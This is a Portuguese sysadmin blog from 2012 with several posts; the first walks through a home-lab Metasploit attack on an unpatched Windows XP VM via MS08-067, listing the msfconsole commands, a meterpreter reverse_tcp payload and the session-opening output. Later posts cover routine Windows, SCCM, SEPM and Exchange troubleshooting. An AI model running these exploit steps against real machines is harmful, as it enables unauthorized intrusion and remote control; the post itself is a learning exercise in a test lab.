sexta-feira, outubro 12, 2012

Metasploit

Recentemente adquiri o livro “Metasploit – The Penetration tester’s Guide”, para quem não sabe o Metasploit é uma ferramenta para profissionais da segurança da informação, com ela é possível explorar vulnerabilidades, é bem interessante, eu particularmente sempre tive curiosidade de como funciona uma invasão, exploração de vulnerabilidade etc. Para os testes com o Metasploit criei um ambiente composto por duas máquinas virtuais, o “alvo” uma máquina Windows XP Sp2 English e a máquina atacante, Debian 6, explorei uma vulnerabilidade famosa do Windows que explora o serviço “Server”, esse problema foi corrigido a algum tempo e máquinas atualizadas não correm este risco, mais informações sobre esse problema podes ser obtidas no seguinte link: http://technet.microsoft.com/en-us/security/bulletin/ms08-067


Abaixo descrevo o processo para obter acesso a máquina Windows XP Sp2 com a vulnerabilidade ms08-057.
Após abrir o console do Metasploit seleciono o exploit:
msf   > use exploit/windows/smb/ms08_067_netapi

Seleciono o “Payload”
msf  > set payload windows/meterpreter/reverse_tcp
Utilizando o reverse_tcp a máquina alvo que se conecta ao atacante.

Por padrão a descoberta do algo (SO) está como automático, uma boa prática é descobrir a versão do SO, você podes obter uma lista utilizando o comando show targets.

msf > set TARGET 4
4   Windows XP SP2 English (NX)
A opção NX diz que o DEP está ativado, no Windows XP Sp2 isso é ativado por padrão, o DEP é um recurso interessante que “impede” a execução de código em determinadas área de SO:
http://en.wikipedia.org/wiki/NX_bit

Especifico o host que será atacado (RHOST) e o host que é o atacante (LHOST):
msf > set RHOST 192.168.0.7

msf > set LHOST  192.168.0.18

Posso escolher uma porta para conexão com o comando set LPORT.
Basicamente as opções ficaram assim (comando show options):


Após as opções estarem definidas basta executar o comando exploit:
msf  exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.0.18:4444
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.0.7
[*] Meterpreter session 2 opened (192.168.0.18:4444 -> 192.168.0.7:1088) at 2012-10-12 12:40:04 -0300

Se tudo estiver correto parabéns, você invadiu sua primeira máquina.
Posso obter os processos em execução na máquina algo digitando o comando ps, conforme print abaixo, e também obter um shell com o comando shell:


Basicamente é esse o processo, claro que em um ambiente de teste é fácil executar este tipo de teste, mas na "vida real" as coisas não são tão simples asssim, temos firewalls, atualizações, NAT, Antivirus, e outras coisas que podem impedir o sucesso de um ataque.

sábado, setembro 15, 2012

Exame 70-643

Realizei mais um exame da Microsoft o exame foi o 70-643, realizei pela segundo vez, visto que não passei na primeira, no segundo exame como no primeiro foram 50 questões, agora só falta uma prova para fechar o "Enterprise Administrator", pretendo realizar até o final do ano.
Link com informações da prova:

 


sábado, setembro 08, 2012

Instalação de Aplicativos no RDS

Para a instalação de aplicativos em um computador executando o serviço RDS (Remote Desktop Services) devemos alterar o modo de "execução" do computador, que por padrão está no modo "execute", há duas formas de instalar aplicativos no RDS, no painel de controle através da "Install Application on Remote Desktop Server" ou executando o comando change, conforme print abaixo:

Após a execução do comando "change user /install" o servidor está no modo de instalação.

terça-feira, setembro 04, 2012

Erro SCCM 2012 - Report Builder 2.0

Ao tentar criar um relatório no System Center Configuration Manager 2012 o seguinte erro era apresentado:

"Report Builder 2.0 is not installed as a click-once application on report server 'myserver'"
Para resolver o problema basta acessar o regedit:

 Acessar o caminho:  'HKLM\Software\Wow6432Node\Microsoft\ConfigMgr10\AdminUI\Reporting\'

Altere o valor da String ReportBuilderApplicationManifestName de “ReportBuilder_2_0_0_0.application”
para “ReportBuilder_3_0_0_0.application”.
Após issofoi possível criar relatórios no SCCM.

segunda-feira, setembro 03, 2012

SQLANYs_sem5 Could not start server

Problema: O log de transações do banco de dados do SEPM corrompido, não conseguia iniciar o serviço da base de dados e do gerenciador do SEPM os seguintes logs eram gerados:
SQLANYs_sem5
Database cannot be started -- sem5.log is an invalid transaction log
SQLANYs_sem5
Could not start server

Solução:
Renomear o arquivo de log "%localdeinstalacaoSEPM%Manager\db\" renomear sem5.log para sem5.log.old

Acessar via prompt de comando o seguinte caminho: "%localdeinstalacaoSEPM%\ASA\win32\"
Forçar a recriação do sem5.log, com o comando abaixo:
A versão do dbsrv vai depender da versão da base de dados do SEPM, que no meu caso era 11.
"dbsrv11 -f "%localdeinstalacaoSEPM%\db\sem5.db"

Após o comando iniciar os serviços Symantec Embedded Database Service e Symantec Endpoint Protection Manager service.

domingo, julho 15, 2012

Criar CD Windows PE

O Windows PE é o ambiente de pré -instalação do Windows, é possível criá-lo através das ferramentas disponíveis no Windows AIK que pode ser baixado no link abaixo:
http://www.microsoft.com/en-us/download/details.aspx?id=5753
Para criar um CD com o Windows PE é necessário executar os passos abaixo:
Iniciar o Windows AIK;
Executar os seguintes comandos;
Copype.cmd amd64 C:\win_PE64
copy "c:\Program Files\Windows AIK\Tools\amd64\imagex.exe" C:\win_PE64\ISO

Criar um arquivo Wimscript.ini e salvar na pasta C:\win_PE\ISO, o arquivo Wimscript.ini deve possuir o seguinte conteúdo:

[ExclusionList]
ntfs.log
hiberfil.sys
pagefile.sys
"System Volume Information"
RECYCLER
Windows\CSC

[CompressionExclusionList]
*.mp3
*.zip
*.cab\WINDOWS\inf\
*.pnf

[ExclusionList]
Especifica quais arquivos não devem ser capturados através da ferramenta imageX
[CompressExclusionList] Quais arquivos ou tipos de arquivos que não devem ser compactados.

E finalmente executar o Oscdimg.exe
Oscdimg -n -bc:\win_PE64\etfsboot.com c:\win_PE64\ISO c:\win_PE64\winPE_amd64.iso




Seu CD com o ambiente de pré-instalação do Windows foi criado.


quinta-feira, julho 12, 2012

Symantec Endpoint Protection Manager server - Log da base de dados

Recentemente tive um problema com o log de transações base de dados do SEPM (
%caminhodeinstalacaodoSEPM%\db\sem5.log), estava usando quase todo o espaço em disco, o motivo é que não estava configurado a opção "Truncate the database transaction logs", após efetuar a configuração não tive mais este tipo de problema, abaixo os passos para configuração:
Acessar o SEPM - Admin - Server - Selecionar a base de dados conforme print abaixo:



Editar as propriedades da base de dados e marcar a opção "Trucate the database transaction logs", é possível executar o procedimento manualmente, basta selecionar a base de dados (click com o botão direito do mouse) e executar Truncate Transaction Log Now.

terça-feira, julho 10, 2012

550 5.7.1 RESOLVER.RST.AuthRequired; authentication required


Ao enviar e-mail para um respectivo grupo era gerado a seguinte mensagem:
550 5.7.1 RESOLVER.RST.AuthRequired; authentication required

Solução:
Acessar o Exchange, selecionar o grupo e desmarcar a opção "Require that all sender are authenticated"

domingo, julho 08, 2012

Erro 800F0818 ao aplicar Sp1 - Windows Server 2008 R2

Ao aplicar o Sp1 do Windows Server 2008 R2 a seguinte mensagem era gerada:


Para resolver o problema executei os seguintes procedimentos:
2 - Verificar o log da ferramenta em:
%systemroot%\Logs\CBS\CheckSur.log
Verificando o log encontrei dois erros, com o KB2675157, então efetuei o download do respectivo KB.
3 - Após baixar o pacote usei o comando "expand" para "expandir" o arquivo .msu com o seguinte comando
C:\expand -F:* Windows6.1-KB2675157-x64.msu C:\update
Neste caso C:\update é a pasta onde vou expandir o arquivo.
Com este comando será gerado um arquivo .cab terei que expandi-lo também:
C:\expand -F:* Windows6.1-KB2675157-x64.cab C:\update\cab
4 - Vários arquivos seram gerados (pasta cab), basta copiar os arquivos que foram indentificados como "corrompidos" (log CheckSur.log passo 2) para o seguinte caminho:
 %systemroot%\Servicing\Packages, será necessário sobreescrever os arquivos.
5 -  Executar novamente a ferramenta System Update Readiness Tool for Windows server 2008 R2 (passo 1), verificar o log se foi gerado algum erro (%systemroot%\Logs\CBS\CheckSur.log):

=================================
Checking System Update Readiness.
Binary Version 6.1.7601.21645
Package Version 15.0
2012-07-08 12:27

Checking Windows Servicing Packages
Checking Package Manifests and Catalogs
Checking Package Watchlist
Checking Component Watchlist
Checking Packages
Checking Component Store
Summary:
Seconds executed: 117
No errors detected

6 - Se nenhum erro foi gerado é possível aplicar o SP1.






sábado, junho 30, 2012

Bloquear estação de trabalho - GPO

Surgiu a necessidade de efetuar o bloqueio da estação de trabalho do usuário, quando a estação ficar um número X de minutos inativa, isso é importante por questões de segurança, já que não são todos que tem o "hábito" de bloquear a estação de trabalho quando sai para um café ou outra coisa.
Abaixo um print com as diretivas envolvidas:


 Trabalhei com 5 diretivas, mais detalhes basta ler a descrição.

Para o "Bloqueio" adicionei o seguinte valor "rundll32 user32.dll,LockWorkStation" na diretiva "Force specific screen saver":